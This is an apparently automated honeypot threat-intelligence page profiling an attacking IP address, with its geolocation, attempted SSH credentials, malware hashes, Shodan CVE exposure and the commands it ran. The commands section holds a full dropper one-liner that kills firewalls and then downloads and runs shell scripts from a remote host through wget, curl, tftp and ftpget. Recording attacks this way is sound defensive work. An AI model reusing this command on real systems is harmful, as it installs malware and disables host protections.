Active Threat • MEDIUM

185.242.3.105

Country of Origin🇳🇱 Netherlands

First Detection3/13/2026

Last Activity4/8/2026

ISPNetiface Limited

🎯

346

Total Attacks

🔌

Ports

📡

Attack Types

🦠

Malware

Geolocation

Country: 🇳🇱 Netherlands
City: Unknown
ASN: AS60223
ISP: Netiface Limited

Attack Types

ssh_telnet_honeypot

Attacked Ports

2223

Associated Malware

a1e06eef4eba8fab5c89...→e3b0c44298fc1c149afb...→

Attempted Credentials

🔐root/admin

28x

🔐root/Vs!KMr#G3TVA

Executed Commands

$wget curl -o sshbins.sh http://88.214.20.14/sshbins.sh4x

pkill iptables -9; pkill firewalld -9; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; busybox wget curl -o sshbins.sh http://88.214.20.14/sshbins.sh;curl -o sshbins.sh http://88.214.20.14/sshbins.sh; wget http://88.214.20.14/sshbins.sh; chmod 777 sshbins.sh; sh sshbins.sh; tftp 88.214.20.14 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 88.214.20.14; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 88.214.20.14 ftp1.sh ftp1.sh; sh ftp1.sh

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports

Vulnerabilities

CVE-2024-24795CVE-2022-30556CVE-2013-4365CVE-2025-66200CVE-2025-53020CVE-2023-27522CVE-2022-31813CVE-2024-47252CVE-2025-59775CVE-2025-23048CVE-2024-38473CVE-2024-43394CVE-2024-27316CVE-2006-20001CVE-2023-38709CVE-2012-4360CVE-2022-22719CVE-2024-43204CVE-2025-55753CVE-2022-28614

CPEs

cpe:/o:canonical:ubuntu_linuxcpe:/a:apache:http_server:2.4.52

Risk Assessment

/100

LowMediumHighCritical